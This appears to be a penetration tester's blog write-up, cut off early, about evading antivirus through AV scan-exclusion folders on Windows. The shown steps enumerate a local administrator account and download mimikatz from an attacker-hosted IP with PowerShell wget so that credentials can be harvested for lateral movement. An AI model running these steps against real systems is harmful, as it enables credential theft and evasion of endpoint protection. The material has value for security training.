AV-bypass is our one of the challanging stage when doing penetration testing. Sometimes we do not need to act any bypass method cause of AV did not configure correctly or it is not licesed and it does not catch or detect our payloads, enumeration tools etc. But in generally, they can be frustrating.
In this write, I do not provide any AV bypass, hidding or encryption method. Sometimes simple methods can be more effective.
As you know, Some applications or services works as malicious by endpoint protection softwares somehow and vendors advise to exclude them for AV scanning. End of the day, IT admins add them to AV scan exclude list and related applications or services work as expected.
So, as we penetration testers want to run our payloads correctly and get reverse shell or runs enum tools as exptected. It is our right, Is not it ?
C:\Users\berkan\Desktop>net user berkan net user berkan User name berkan Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 4/24/2021 8:35:27 PM Password expires Never Password changeable 4/24/2021 8:35:27 PM Password required No User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 5/31/2021 6:46:10 PM
Logon hours allowed All
Local Group Memberships *Administrators Global Group memberships *None The command completed successfully.
C:\Users\berkan\Desktop>
What a chance, the user is a member of local administrators group. Well, let’s run mimikatz and get some hashes or clear-text passwords for lateral movement.
C:\Temp>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Temp> wget"http://172.16.255.20/mimikatz/x64/mimikatz.exe"-OutFile"C:\Temp\mimikatz.exe" wget"http://172.16.255.20/mimikatz/x64/mimikatz.exe"-OutFile"C:\Temp\mimikatz.exe" PS C:\Temp> dir dir